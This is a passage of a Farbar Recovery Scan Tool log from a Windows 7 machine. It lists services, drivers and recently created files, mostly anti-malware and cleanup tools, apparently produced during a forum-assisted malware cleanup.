S3 Wecsvc; C:\Windows\system32\wecsvc.dll [237568 2009-07-13] (Microsoft Corporation) [File not signed]
S3 wercplsupport; C:\Windows\System32\wercplsupport.dll [84480 2009-07-13] (Microsoft Corporation) [File not signed]
S3 WerSvc; C:\Windows\System32\WerSvc.dll [76800 2009-07-13] (Microsoft Corporation) [File not signed]
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation) [File not signed]
R3 WinHttpAutoProxySvc; C:\Windows\system32\winhttp.dll [444416 2010-11-20] (Microsoft Corporation) [File not signed]
R3 WinHttpAutoProxySvc; C:\Windows\SysWOW64\winhttp.dll [351232 2010-11-20] (Microsoft Corporation) [File not signed]
R2 Winmgmt; C:\Windows\system32\wbem\WMIsvc.dll [242688 2009-07-13] (Microsoft Corporation) [File not signed]
S3 WinRM; C:\Windows\system32\WsmSvc.dll [2018304 2010-11-20] (Microsoft Corporation) [File not signed]
S3 WinRM; C:\Windows\SysWOW64\WsmSvc.dll [1175040 2010-11-20] (Microsoft Corporation) [File not signed]
S3 Wlansvc; C:\Windows\System32\wlansvc.dll [886784 2009-07-13] (Microsoft Corporation) [File not signed]
S3 wmiApSrv; C:\Windows\system32\wbem\WmiApSrv.exe [203264 2009-07-13] (Microsoft Corporation) [File not signed]
R2 WMPNetworkSvc; C:\Program Files\Windows Media Player\wmpnetwk.exe [1525248 2010-11-20] (Microsoft Corporation) [File not signed]
S3 WPCSvc; C:\Windows\System32\wpcsvc.dll [12288 2009-07-13] (Microsoft Corporation) [File not signed]
S3 WPCSvc; C:\Windows\SysWOW64\wpcsvc.dll [10752 2009-07-13] (Microsoft Corporation) [File not signed]
R3 WPDBusEnum; C:\Windows\system32\wpdbusenum.dll [117248 2010-11-20] (Microsoft Corporation) [File not signed]
R2 wscsvc; C:\Windows\system32\wscsvc.dll [97280 2009-07-13] (Microsoft Corporation) [File not signed]
S2 WSearch; C:\Windows\system32\SearchIndexer.exe [591872 2011-05-04] (Microsoft Corporation) [File not signed]
S2 WSearch; C:\Windows\SysWOW64\SearchIndexer.exe [427520 2011-05-03] (Microsoft Corporation) [File not signed]
R3 wudfsvc; C:\Windows\System32\WUDFSvc.dll [84992 2012-07-25] (Microsoft Corporation) [File not signed]
S3 WwanSvc; C:\Windows\System32\wwansvc.dll [228864 2014-01-27] (Microsoft Corporation) [File not signed]
S3 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [X]
S4 McciServiceHost; "C:\Program Files (x86)\Common Files\Motive\McciServiceHost.exe" [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 1394ohci; C:\Windows\system32\drivers\1394ohci.sys [229888 2010-11-20] (Microsoft Corporation) [File not signed]
S3 AcpiPmi; C:\Windows\system32\drivers\acpipmi.sys [12800 2010-11-20] (Microsoft Corporation) [File not signed]
R1 AFD; C:\Windows\system32\drivers\afd.sys [497152 2014-05-30] (Microsoft Corporation) [File not signed]
R3 AgereSoftModem; C:\Windows\System32\DRIVERS\agrsm64.sys [1212416 2010-01-26] (LSI Corporation) [File not signed]
S3 AmdK8; C:\Windows\system32\DRIVERS\amdk8.sys [64512 2009-07-13] (Microsoft Corporation) [File not signed]
S3 AmdPPM; C:\Windows\system32\DRIVERS\amdppm.sys [60928 2009-07-13] (Microsoft Corporation) [File not signed]
S3 AppID; C:\Windows\system32\drivers\appid.sys [61440 2010-11-20] (Microsoft Corporation) [File not signed]
U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Corporation) [File not signed]
S3 AsyncMac; C:\Windows\System32\DRIVERS\asyncmac.sys [23040 2009-07-13] (Microsoft Corporation) [File not signed]
S3 b06bdrv; C:\Windows\system32\DRIVERS\bxvbda.sys [468480 2009-06-10] (Broadcom Corporation) [File not signed]
S3 b57nd60a; C:\Windows\System32\DRIVERS\b57nd60a.sys [270848 2009-06-10] (Broadcom Corporation) [File not signed]
R1 Beep; C:\Windows\System32\Drivers\Beep.sys [6656 2009-07-13] (Microsoft Corporation) [File not signed]
R1 blbdrive; C:\Windows\system32\DRIVERS\blbdrive.sys [45056 2009-07-13] (Microsoft Corporation) [File not signed]
R3 bowser; C:\Windows\System32\DRIVERS\bowser.sys [90624 2011-02-22] (Microsoft Corporation) [File not signed]
S3 BrFiltLo; C:\Windows\system32\DRIVERS\BrFiltLo.sys [18432 2009-06-10] (Brother Industries, Ltd.) [File not signed]
S3 BrFiltUp; C:\Windows\system32\DRIVERS\BrFiltUp.sys [8704 2009-06-10] (Brother Industries, Ltd.) [File not signed]
S3 BridgeMP; C:\Windows\System32\DRIVERS\bridge.sys [95232 2009-07-13] (Microsoft Corporation) [File not signed]
S3 Brserid; C:\Windows\System32\Drivers\Brserid.sys [286720 2009-07-13] (Brother Industries Ltd.) [File not signed]
S3 BrSerWdm; C:\Windows\System32\Drivers\BrSerWdm.sys [47104 2009-06-10] (Brother Industries Ltd.) [File not signed]
S3 BrUsbMdm; C:\Windows\System32\Drivers\BrUsbMdm.sys [14976 2009-06-10] (Brother Industries Ltd.) [File not signed]
S3 BrUsbSer; C:\Windows\System32\Drivers\BrUsbSer.sys [14720 2009-06-10] (Brother Industries Ltd.) [File not signed]
S3 BTHMODEM; C:\Windows\system32\DRIVERS\bthmodem.sys [72192 2009-07-13] (Microsoft Corporation) [File not signed]
S4 cdfs; C:\Windows\System32\DRIVERS\cdfs.sys [92160 2009-07-13] (Microsoft Corporation) [File not signed]
R1 cdrom; C:\Windows\system32\drivers\cdrom.sys [147456 2010-11-20] (Microsoft Corporation) [File not signed]
S3 circlass; C:\Windows\system32\DRIVERS\circlass.sys [45568 2009-07-13] (Microsoft Corporation) [File not signed]
S3 CmBatt; C:\Windows\system32\DRIVERS\CmBatt.sys [17664 2009-07-13] (Microsoft Corporation) [File not signed]
R3 CompositeBus; C:\Windows\system32\drivers\CompositeBus.sys [38912 2010-11-20] (Microsoft Corporation) [File not signed]
R1 DfsC; C:\Windows\System32\Drivers\dfsc.sys [102400 2010-11-20] (Microsoft Corporation) [File not signed]
R1 discache; C:\Windows\System32\drivers\discache.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 drmkaud; C:\Windows\system32\drivers\drmkaud.sys [5632 2009-07-13] (Microsoft Corporation) [File not signed]
R3 dsNcAdpt; C:\Windows\System32\DRIVERS\dsNcAdpt.sys [36816 2013-11-21] (Juniper Networks) [File not signed]
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation) [File not signed]
S3 ErrDev; C:\Windows\system32\drivers\errdev.sys [9728 2009-07-13] (Microsoft Corporation) [File not signed]
S3 exfat; C:\Windows\System32\Drivers\exfat.sys [195072 2009-07-13] (Microsoft Corporation) [File not signed]
S3 fastfat; C:\Windows\System32\Drivers\fastfat.sys [204800 2009-07-13] (Microsoft Corporation) [File not signed]
S3 fdc; C:\Windows\system32\DRIVERS\fdc.sys [29696 2009-07-13] (Microsoft Corporation) [File not signed]
S3 Filetrace; C:\Windows\System32\drivers\filetrace.sys [34304 2009-07-13] (Microsoft Corporation) [File not signed]
S3 flpydisk; C:\Windows\system32\DRIVERS\flpydisk.sys [24576 2009-07-13] (Microsoft Corporation) [File not signed]
S3 hcw85cir; C:\Windows\system32\drivers\hcw85cir.sys [31232 2009-06-10] (Hauppauge Computer Works, Inc.) [File not signed]
R3 HDAudBus; C:\Windows\system32\drivers\HDAudBus.sys [122368 2010-11-20] (Microsoft Corporation) [File not signed]
S3 HidBatt; C:\Windows\system32\DRIVERS\HidBatt.sys [26624 2009-07-13] (Microsoft Corporation) [File not signed]
S3 HidBth; C:\Windows\system32\DRIVERS\hidbth.sys [100864 2009-07-13] (Microsoft Corporation) [File not signed]
S3 HidIr; C:\Windows\system32\DRIVERS\hidir.sys [46592 2009-07-13] (Microsoft Corporation) [File not signed]
R3 HidUsb; C:\Windows\System32\DRIVERS\hidusb.sys [30208 2010-11-20] (Microsoft Corporation) [File not signed]
S3 HTCAND64; C:\Windows\System32\Drivers\ANDROIDUSB.sys [33736 2009-11-02] (HTC, Corporation) [File not signed]
R3 HTTP; C:\Windows\System32\drivers\HTTP.sys [753664 2010-11-20] (Microsoft Corporation) [File not signed]
S3 i8042prt; C:\Windows\system32\drivers\i8042prt.sys [105472 2009-07-13] (Microsoft Corporation) [File not signed]
R3 igfx; C:\Windows\System32\DRIVERS\igdkmd64.sys [6177472 2009-09-11] (Intel Corporation) [File not signed]
R2 ImmunetNetworkMonitorDriver; C:\Windows\System32\Drivers\ImmunetNetworkMonitor.sys [100048 2014-09-03] (Sourcefire, Inc.)
R1 ImmunetProtectDriver; C:\Windows\System32\Drivers\immunetprotect.sys [58064 2014-09-03] (Windows ® Win 7 DDK provider)
R1 ImmunetSelfProtectDriver; C:\Windows\System32\Drivers\immunetselfprotect.sys [32976 2014-09-03] (Windows ® Win 7 DDK provider)
R3 intelppm; C:\Windows\system32\DRIVERS\intelppm.sys [62464 2009-07-13] (Microsoft Corporation) [File not signed]
S3 IpFilterDriver; C:\Windows\System32\DRIVERS\ipfltdrv.sys [82944 2010-11-20] (Microsoft Corporation) [File not signed]
S3 IPMIDRV; C:\Windows\system32\drivers\IPMIDrv.sys [78848 2010-11-20] (Microsoft Corporation) [File not signed]
S3 IPNAT; C:\Windows\System32\drivers\ipnat.sys [116224 2009-07-13] (Microsoft Corporation) [File not signed]
S3 IRENUM; C:\Windows\System32\drivers\irenum.sys [17920 2009-07-13] (Microsoft Corporation) [File not signed]
R3 kbdhid; C:\Windows\System32\DRIVERS\kbdhid.sys [33280 2010-11-20] (Microsoft Corporation) [File not signed]
R3 ksthunk; C:\Windows\system32\drivers\ksthunk.sys [20992 2009-07-13] (Microsoft Corporation) [File not signed]
R2 lltdio; C:\Windows\System32\DRIVERS\lltdio.sys [60928 2009-07-13] (Microsoft Corporation) [File not signed]
R2 luafv; C:\Windows\system32\drivers\luafv.sys [113152 2009-07-13] (Microsoft Corporation) [File not signed]
S3 LVPr2M64; C:\Windows\System32\DRIVERS\LVPr2M64.sys [30232 2009-10-07] ()
S3 LVPr2Mon; C:\Windows\System32\DRIVERS\LVPr2M64.sys [30232 2009-10-07] ()
R3 Modem; C:\Windows\System32\drivers\modem.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
R3 monitor; C:\Windows\System32\DRIVERS\monitor.sys [30208 2009-07-13] (Microsoft Corporation) [File not signed]
R3 mouhid; C:\Windows\System32\DRIVERS\mouhid.sys [31232 2009-07-13] (Microsoft Corporation) [File not signed]
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [189440 2011-04-18] (Microsoft Corporation)
R3 mpsdrv; C:\Windows\System32\drivers\mpsdrv.sys [77312 2009-07-13] (Microsoft Corporation) [File not signed]
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2010-07-27] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MREMP50a64; C:\Program Files\Common Files\Motive\MREMP50a64.SYS [43008 2010-07-27] (Printing Communications Assoc., Inc. (PCAUSA))
S3 MRESP50; C:\Program Files (x86)\Common Files\Motive\MRESP50.sys [20096 2010-07-27] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MRESP50a64; C:\Program Files\Common Files\Motive\MRESP50a64.SYS [40960 2010-07-27] (Printing Communications Assoc., Inc. (PCAUSA))
S3 MRxDAV; C:\Windows\system32\drivers\mrxdav.sys [140800 2013-07-04] (Microsoft Corporation) [File not signed]
R3 mrxsmb; C:\Windows\System32\DRIVERS\mrxsmb.sys [158208 2011-04-26] (Microsoft Corporation) [File not signed]
R3 mrxsmb10; C:\Windows\System32\DRIVERS\mrxsmb10.sys [288768 2011-07-08] (Microsoft Corporation) [File not signed]
R3 mrxsmb20; C:\Windows\System32\DRIVERS\mrxsmb20.sys [128000 2011-04-26] (Microsoft Corporation) [File not signed]
R1 Msfs; C:\Windows\System32\Drivers\Msfs.sys [26112 2009-07-13] (Microsoft Corporation) [File not signed]
S3 mshidkmdf; C:\Windows\System32\drivers\mshidkmdf.sys [8192 2009-07-13] (Microsoft Corporation) [File not signed]
S3 MSKSSRV; C:\Windows\System32\drivers\MSKSSRV.sys [11136 2009-07-13] (Microsoft Corporation) [File not signed]
S3 MSPCLOCK; C:\Windows\System32\drivers\MSPCLOCK.sys [7168 2009-07-13] (Microsoft Corporation) [File not signed]
S3 MSPQM; C:\Windows\System32\drivers\MSPQM.sys [6784 2009-07-13] (Microsoft Corporation) [File not signed]
S3 MSTEE; C:\Windows\System32\drivers\MSTEE.sys [8064 2009-07-13] (Microsoft Corporation) [File not signed]
S3 MTConfig; C:\Windows\system32\DRIVERS\MTConfig.sys [15360 2009-07-13] (Microsoft Corporation) [File not signed]
S3 NativeWifiP; C:\Windows\System32\DRIVERS\nwifi.sys [318976 2009-07-13] (Microsoft Corporation) [File not signed]
S3 NdisCap; C:\Windows\System32\DRIVERS\ndiscap.sys [35328 2009-07-13] (Microsoft Corporation) [File not signed]
R3 NdisTapi; C:\Windows\System32\DRIVERS\ndistapi.sys [24064 2009-07-13] (Microsoft Corporation) [File not signed]
S3 Ndisuio; C:\Windows\System32\DRIVERS\ndisuio.sys [56832 2010-11-20] (Microsoft Corporation) [File not signed]
R3 NdisWan; C:\Windows\System32\DRIVERS\ndiswan.sys [164352 2010-11-20] (Microsoft Corporation) [File not signed]
R3 NDProxy; C:\Windows\System32\Drivers\NDProxy.sys [57856 2010-11-20] (Microsoft Corporation) [File not signed]
R1 NetBIOS; C:\Windows\System32\DRIVERS\netbios.sys [44544 2009-07-13] (Microsoft Corporation) [File not signed]
R1 NetBT; C:\Windows\System32\DRIVERS\netbt.sys [261632 2010-11-20] (Microsoft Corporation) [File not signed]
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [84864 2011-04-27] (Microsoft Corporation)
R1 Npfs; C:\Windows\System32\Drivers\Npfs.sys [44032 2009-07-13] (Microsoft Corporation) [File not signed]
R1 nsiproxy; C:\Windows\System32\drivers\nsiproxy.sys [24576 2009-07-13] (Microsoft Corporation) [File not signed]
R1 Null; C:\Windows\System32\Drivers\Null.sys [6144 2009-07-13] (Microsoft Corporation) [File not signed]
S3 ohci1394; C:\Windows\system32\drivers\ohci1394.sys [72832 2009-07-13] (Microsoft Corporation) [File not signed]
S3 Parport; C:\Windows\system32\DRIVERS\parport.sys [97280 2009-07-13] (Microsoft Corporation) [File not signed]
R2 PEAUTH; C:\Windows\System32\drivers\peauth.sys [651264 2009-07-13] (Microsoft Corporation) [File not signed]
R3 PptpMiniport; C:\Windows\System32\DRIVERS\raspptp.sys [111104 2010-11-20] (Microsoft Corporation) [File not signed]
S3 Processor; C:\Windows\system32\DRIVERS\processr.sys [60416 2009-07-13] (Microsoft Corporation) [File not signed]
R1 Psched; C:\Windows\System32\DRIVERS\pacer.sys [131584 2010-11-20] (Microsoft Corporation) [File not signed]
S3 QWAVEdrv; C:\Windows\system32\drivers\qwavedrv.sys [46592 2009-07-13] (Microsoft Corporation) [File not signed]
S3 RasAcd; C:\Windows\System32\DRIVERS\rasacd.sys [14848 2009-07-13] (Microsoft Corporation) [File not signed]
R3 RasAgileVpn; C:\Windows\System32\DRIVERS\AgileVpn.sys [60416 2009-07-13] (Microsoft Corporation) [File not signed]
R3 Rasl2tp; C:\Windows\System32\DRIVERS\rasl2tp.sys [129536 2010-11-20] (Microsoft Corporation) [File not signed]
R3 RasPppoe; C:\Windows\System32\DRIVERS\raspppoe.sys [92672 2009-07-13] (Microsoft Corporation) [File not signed]
R3 RasSstp; C:\Windows\System32\DRIVERS\rassstp.sys [83968 2009-07-13] (Microsoft Corporation) [File not signed]
R1 rdbss; C:\Windows\System32\DRIVERS\rdbss.sys [309248 2010-11-20] (Microsoft Corporation) [File not signed]
S3 rdpbus; C:\Windows\system32\DRIVERS\rdpbus.sys [24064 2009-07-13] (Microsoft Corporation) [File not signed]
R1 RDPCDD; C:\Windows\System32\DRIVERS\RDPCDD.sys [7680 2009-07-13] (Microsoft Corporation) [File not signed]
R1 RDPENCDD; C:\Windows\System32\drivers\rdpencdd.sys [7680 2009-07-13] (Microsoft Corporation) [File not signed]
R1 RDPREFMP; C:\Windows\System32\drivers\rdprefmp.sys [8192 2009-07-13] (Microsoft Corporation) [File not signed]
S3 RdpVideoMiniport; C:\Windows\System32\drivers\rdpvideominiport.sys [19456 2012-08-23] (Microsoft Corporation) [File not signed]
S3 RDPWD; C:\Windows\System32\Drivers\RDPWD.sys [210944 2012-04-27] (Microsoft Corporation) [File not signed]
R2 rspndr; C:\Windows\System32\DRIVERS\rspndr.sys [76800 2009-07-13] (Microsoft Corporation) [File not signed]
R3 RTL8167; C:\Windows\System32\DRIVERS\Rt64win7.sys [233472 2009-07-13] (Realtek                                            ) [File not signed]
S3 scfilter; C:\Windows\System32\DRIVERS\scfilter.sys [29696 2010-11-20] (Microsoft Corporation) [File not signed]
S3 Serenum; C:\Windows\system32\DRIVERS\serenum.sys [23552 2009-07-13] (Microsoft Corporation) [File not signed]
S3 Serial; C:\Windows\system32\DRIVERS\serial.sys [94208 2009-07-13] (Microsoft Corporation) [File not signed]
S3 sermouse; C:\Windows\system32\DRIVERS\sermouse.sys [26624 2009-07-13] (Microsoft Corporation) [File not signed]
S3 sffdisk; C:\Windows\system32\drivers\sffdisk.sys [14336 2009-07-13] (Microsoft Corporation) [File not signed]
S3 sffp_mmc; C:\Windows\system32\drivers\sffp_mmc.sys [13824 2009-07-13] (Microsoft Corporation) [File not signed]
S3 sffp_sd; C:\Windows\system32\drivers\sffp_sd.sys [14336 2010-11-20] (Microsoft Corporation) [File not signed]
S3 sfloppy; C:\Windows\system32\DRIVERS\sfloppy.sys [16896 2009-07-13] (Microsoft Corporation) [File not signed]
S3 Smb; C:\Windows\System32\DRIVERS\smb.sys [93184 2009-07-13] (Microsoft Corporation) [File not signed]
R3 srv; C:\Windows\System32\DRIVERS\srv.sys [467456 2011-04-28] (Microsoft Corporation) [File not signed]
R3 srv2; C:\Windows\System32\DRIVERS\srv2.sys [410112 2011-04-28] (Microsoft Corporation) [File not signed]
R3 srvnet; C:\Windows\System32\DRIVERS\srvnet.sys [168448 2011-04-28] (Microsoft Corporation) [File not signed]
R2 tcpipreg; C:\Windows\System32\drivers\tcpipreg.sys [45568 2012-10-03] (Microsoft Corporation) [File not signed]
S3 TDPIPE; C:\Windows\System32\drivers\tdpipe.sys [15872 2009-07-13] (Microsoft Corporation) [File not signed]
S3 TDTCP; C:\Windows\System32\drivers\tdtcp.sys [23552 2012-02-16] (Microsoft Corporation) [File not signed]
R1 tdx; C:\Windows\System32\DRIVERS\tdx.sys [119296 2010-11-20] (Microsoft Corporation) [File not signed]
S3 Trufos; C:\Windows\System32\Drivers\trufos.sys [329800 2014-09-03] (BitDefender S.R.L.)
S3 tssecsrv; C:\Windows\System32\DRIVERS\tssecsrv.sys [39936 2013-06-14] (Microsoft Corporation) [File not signed]
S3 TsUsbFlt; C:\Windows\System32\drivers\tsusbflt.sys [57856 2012-08-23] (Microsoft Corporation) [File not signed]
R3 tunnel; C:\Windows\System32\DRIVERS\tunnel.sys [125440 2010-11-20] (Microsoft Corporation) [File not signed]
S4 udfs; C:\Windows\System32\DRIVERS\udfs.sys [328192 2010-11-20] (Microsoft Corporation) [File not signed]
R3 umbus; C:\Windows\system32\drivers\umbus.sys [48640 2010-11-20] (Microsoft Corporation) [File not signed]
S3 UmPass; C:\Windows\system32\DRIVERS\umpass.sys [9728 2009-07-13] (Microsoft Corporation) [File not signed]
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2012-12-13] (Apple, Inc.) [File not signed]
R3 usbccgp; C:\Windows\System32\DRIVERS\usbccgp.sys [99840 2013-11-26] (Microsoft Corporation) [File not signed]
S3 usbcir; C:\Windows\system32\drivers\usbcir.sys [100864 2013-07-12] (Microsoft Corporation) [File not signed]
R3 usbehci; C:\Windows\System32\DRIVERS\usbehci.sys [53248 2013-11-26] (Microsoft Corporation) [File not signed]
R3 usbhub; C:\Windows\System32\DRIVERS\usbhub.sys [343040 2013-11-26] (Microsoft Corporation) [File not signed]
S3 usbohci; C:\Windows\system32\drivers\usbohci.sys [25600 2013-11-26] (Microsoft Corporation) [File not signed]
R3 usbprint; C:\Windows\System32\DRIVERS\usbprint.sys [25088 2009-07-13] (Microsoft Corporation) [File not signed]
R3 usbscan; C:\Windows\system32\drivers\usbscan.sys [42496 2013-07-02] (Microsoft Corporation) [File not signed]
R3 USBSTOR; C:\Windows\System32\DRIVERS\USBSTOR.SYS [91648 2011-03-10] (Microsoft Corporation) [File not signed]
R3 usbuhci; C:\Windows\System32\DRIVERS\usbuhci.sys [30720 2013-11-26] (Microsoft Corporation) [File not signed]
S3 vga; C:\Windows\System32\DRIVERS\vgapnp.sys [29184 2009-07-13] (Microsoft Corporation) [File not signed]
R1 VgaSave; C:\Windows\System32\drivers\vga.sys [29184 2009-07-13] (Microsoft Corporation) [File not signed]
S3 vwifibus; C:\Windows\System32\drivers\vwifibus.sys [24576 2009-07-13] (Microsoft Corporation) [File not signed]
S3 WacomPen; C:\Windows\system32\DRIVERS\wacompen.sys [27776 2009-07-13] (Microsoft Corporation) [File not signed]
S3 WANARP; C:\Windows\System32\DRIVERS\wanarp.sys [88576 2010-11-20] (Microsoft Corporation) [File not signed]
R1 Wanarpv6; C:\Windows\System32\DRIVERS\wanarp.sys [88576 2010-11-20] (Microsoft Corporation) [File not signed]
R1 WfpLwf; C:\Windows\System32\DRIVERS\wfplwf.sys [12800 2009-07-13] (Microsoft Corporation) [File not signed]
S3 WinUsb; C:\Windows\System32\DRIVERS\WinUsb.sys [41984 2010-11-20] (Microsoft Corporation) [File not signed]
S3 WmiAcpi; C:\Windows\system32\drivers\wmiacpi.sys [14336 2009-07-13] (Microsoft Corporation) [File not signed]
R1 ws2ifsl; C:\Windows\system32\drivers\ws2ifsl.sys [21504 2009-07-13] (Microsoft Corporation) [File not signed]
R3 WudfPf; C:\Windows\System32\drivers\WudfPf.sys [87040 2012-07-25] (Microsoft Corporation) [File not signed]
R3 WUDFRd; C:\Windows\System32\DRIVERS\WUDFRd.sys [198656 2012-07-25] (Microsoft Corporation) [File not signed]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U2 CVPNDrv; No ImagePath
S3 MREMPR5; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS [X]
S3 MRENDIS5; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-30 15:31 - 2014-09-30 15:32 - 00047642 _____ () C:\Users\Camille\Desktop\FRST.txt
2014-09-30 15:31 - 2014-09-30 15:31 - 00000000 ____D () C:\FRST
2014-09-30 15:30 - 2014-09-30 15:30 - 02108928 _____ (Farbar) C:\Users\Camille\Desktop\FRST64.exe
2014-09-30 06:52 - 2014-09-30 06:52 - 00000000 ____D () C:\Program Files (x86)\Citrix
2014-09-29 10:38 - 2014-09-29 10:38 - 01373475 _____ () C:\Users\Camille\Desktop\adwcleaner_3.310.exe
2014-09-25 11:31 - 2014-09-25 11:31 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-09-25 11:20 - 2014-09-25 11:20 - 00019196 _____ () C:\Users\Camille\Desktop\dds.txt
2014-09-25 11:20 - 2014-09-25 11:20 - 00017588 _____ () C:\Users\Camille\Desktop\attach.txt
2014-09-24 09:00 - 2014-09-24 09:24 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-24 08:38 - 2014-09-24 08:39 - 00043073 _____ () C:\Users\Camille\Downloads\Result.txt
2014-09-24 08:34 - 2014-09-24 08:35 - 00002912 _____ () C:\Users\Camille\Downloads\FSS.txt
2014-09-23 11:21 - 2014-09-30 15:10 - 00000000 ____D () C:\Users\Camille\Desktop\Troubleshooting
2014-09-23 11:09 - 2014-09-23 11:09 - 00000000 ____D () C:\MGADiagToolOutput
2014-09-23 10:58 - 2014-09-23 10:58 - 02031992 _____ (Microsoft Corporation) C:\Users\Camille\Downloads\MGADiag(1).exe
2014-09-23 10:41 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-09-23 10:41 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-09-23 10:41 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-09-23 10:41 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-09-23 10:41 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-09-23 10:41 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-09-23 10:41 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-09-23 10:41 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-09-23 10:40 - 2014-09-23 10:52 - 00000000 ___SD () C:\ComboFix
2014-09-23 10:33 - 2014-09-23 10:41 - 00000000 ____D () C:\Qoobox
2014-09-23 10:31 - 2014-09-23 10:52 - 00000000 ____D () C:\Windows\erdnt
2014-09-23 10:31 - 2014-09-23 10:41 - 00000000 ___SD () C:\32788R22FWJFW
2014-09-23 10:22 - 2014-09-23 10:22 - 00000000 ____D () C:\Windows\ERUNT
2014-09-21 21:28 - 2014-09-30 15:24 - 00000000 ____D () C:\AdwCleaner
2014-09-21 21:28 - 2014-09-21 21:28 - 01373475 _____ () C:\Users\Camille\Downloads\AdwCleaner(1).exe
2014-09-21 21:21 - 2014-09-21 21:21 - 00000184 _____ () C:\Windows\wininit.ini
2014-09-21 21:10 - 2014-09-21 21:10 - 00001176 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 9.lnk
2014-09-21 21:10 - 2014-09-21 21:10 - 00000000 ____D () C:\Users\Camille\AppData\Roaming\TeamViewer
2014-09-21 21:10 - 2014-09-21 21:10 - 00000000 ____D () C:\Program Files (x86)\TeamViewer
2014-09-21 21:00 - 2014-09-21 21:00 - 00000000 ____D () C:\ProgramData\Office Genuine Advantage
2014-09-21 20:52 - 2014-09-21 20:52 - 00001393 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-09-21 20:52 - 2014-09-21 20:52 - 00000000 ____D () C:\Windows\System32\Tasks\Safer-Networking
2014-09-21 20:52 - 2014-09-21 20:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-09-21 20:51 - 2014-09-24 08:19 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-09-21 20:51 - 2014-09-21 21:08 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-09-21 20:51 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe
2014-09-21 20:50 - 2014-09-21 20:51 - 00000000 ____D () C:\Windows\softwaredistribution.old
2014-09-21 20:30 - 2014-09-21 20:30 - 00000000 ____D () C:\Users\Camille\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HiJackThis
2014-09-21 20:30 - 2014-09-21 20:30 - 00000000 ____D () C:\Program Files (x86)\Trend Micro
2014-09-03 13:15 - 2014-09-03 13:15 - 00000000 ____D () C:\Program Files\Adblock Plus for IE
2014-09-03 13:13 - 2014-09-03 13:13 - 05952624 _____ ( ) C:\Users\Camille\Downloads\adblockplusie-1.2.exe
2014-09-03 13:10 - 2014-09-28 03:00 - 00000296 _____ () C:\Windows\Tasks\Immunet Scan 599667.job
2014-09-03 13:10 - 2014-09-03 13:10 - 00003214 _____ () C:\Windows\System32\Tasks\Immunet Scan 599667
2014-09-03 13:09 - 2014-09-30 15:32 - 00000000 ____D () C:\Program Files\Immunet
2014-09-03 13:09 - 2014-09-03 13:10 - 00000000 ____D () C:\ProgramData\Immunet
2014-09-03 13:09 - 2014-09-03 13:09 - 00329800 _____ (BitDefender S.R.L.) C:\Windows\system32\Drivers\trufos.sys
2014-09-03 13:09 - 2014-09-03 13:09 - 00100048 _____ (Sourcefire, Inc.) C:\Windows\system32\Drivers\ImmunetNetworkMonitor.sys
2014-09-03 13:09 - 2014-09-03 13:09 - 00058064 _____ (Windows ® Win 7 DDK provider) C:\Windows\system32\Drivers\immunetprotect.sys
2014-09-03 13:09 - 2014-09-03 13:09 - 00032976 _____ (Windows ® Win 7 DDK provider) C:\Windows\system32\Drivers\immunetselfprotect.sys
2014-09-03 13:09 - 2014-09-03 13:09 - 00000000 ____H () C:\Windows\system32\Drivers\Msft_Kernel_ImmunetNetworkMonitor_01009.Wdf
2014-09-03 13:09 - 2014-09-03 13:09 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Immunet 3
2014-09-03 12:36 - 2014-09-30 15:25 - 00020982 _____ () C:\Windows\PFRO.log
2014-09-03 12:25 - 2014-09-24 09:00 - 00128728 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-03 12:25 - 2014-09-24 08:59 - 00092888 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
